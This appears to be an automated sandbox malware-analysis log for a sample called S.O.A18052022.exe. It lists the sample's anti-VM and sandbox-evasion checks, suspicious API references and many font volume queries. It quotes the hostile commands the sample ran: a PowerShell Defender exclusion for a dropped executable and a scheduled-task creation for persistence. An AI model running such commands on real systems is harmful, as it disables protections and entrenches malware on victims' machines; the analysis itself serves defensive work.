                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: 00000000.00000002.284445306.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: S.O.A18052022.exe PID: 1216, type: MEMORYSTR
                    Source: S.O.A18052022.exe, 00000000.00000002.284445306.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: S.O.A18052022.exe, 00000000.00000002.284445306.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\S.O.A18052022.exe TID: 2944Thread sleep time: -45733s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6300Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Users\user\Desktop\S.O.A18052022.exe TID: 6496Thread sleep time: -18446744073709540s >= -30000s
                    Source: C:\Users\user\Desktop\S.O.A18052022.exe TID: 6500Thread sleep count: 4141 > 30
                    Source: C:\Users\user\Desktop\S.O.A18052022.exe TID: 6500Thread sleep count: 4351 > 30
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6602
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1707
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeWindow / User API: threadDelayed 4141
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeWindow / User API: threadDelayed 4351
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeThread delayed: delay time: 45733
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeThread delayed: delay time: 922337203685477
                    Source: S.O.A18052022.exe, 00000000.00000002.284445306.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: S.O.A18052022.exe, 00000000.00000002.284445306.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: S.O.A18052022.exe, 00000000.00000002.284445306.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: S.O.A18052022.exe, 00000008.00000002.504927842.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: S.O.A18052022.exe, 00000000.00000002.284445306.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeCode function: 8_2_0628A7A8 LdrInitializeThunk,
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: S.O.A18052022.exe, Yi/Fe.csReference to suspicious API methods: ('pAA', 'LoadLibrary@kernel32'), ('OAP', 'GetProcAddress@kernel32')
                    Source: DIPrtjjfjUpyJ.exe.0.dr, Yi/Fe.csReference to suspicious API methods: ('pAA', 'LoadLibrary@kernel32'), ('OAP', 'GetProcAddress@kernel32')
                    Source: 0.0.S.O.A18052022.exe.c30000.0.unpack, Yi/Fe.csReference to suspicious API methods: ('pAA', 'LoadLibrary@kernel32'), ('OAP', 'GetProcAddress@kernel32')
                    Source: 0.2.S.O.A18052022.exe.c30000.0.unpack, Yi/Fe.csReference to suspicious API methods: ('pAA', 'LoadLibrary@kernel32'), ('OAP', 'GetProcAddress@kernel32')
                    Source: 8.0.S.O.A18052022.exe.700000.9.unpack, Yi/Fe.csReference to suspicious API methods: ('pAA', 'LoadLibrary@kernel32'), ('OAP', 'GetProcAddress@kernel32')
                    Source: 8.0.S.O.A18052022.exe.400000.12.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 8.0.S.O.A18052022.exe.400000.10.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 8.0.S.O.A18052022.exe.400000.4.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 8.0.S.O.A18052022.exe.700000.13.unpack, Yi/Fe.csReference to suspicious API methods: ('pAA', 'LoadLibrary@kernel32'), ('OAP', 'GetProcAddress@kernel32')
                    Source: 8.0.S.O.A18052022.exe.700000.11.unpack, Yi/Fe.csReference to suspicious API methods: ('pAA', 'LoadLibrary@kernel32'), ('OAP', 'GetProcAddress@kernel32')
                    Source: 8.2.S.O.A18052022.exe.400000.0.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DIPrtjjfjUpyJ.exe
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DIPrtjjfjUpyJ.exe
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DIPrtjjfjUpyJ.exe
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DIPrtjjfjUpyJ" /XML "C:\Users\user\AppData\Local\Temp\tmp7211.tmp
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeProcess created: C:\Users\user\Desktop\S.O.A18052022.exe C:\Users\user\Desktop\S.O.A18052022.exe
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Users\user\Desktop\S.O.A18052022.exe VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
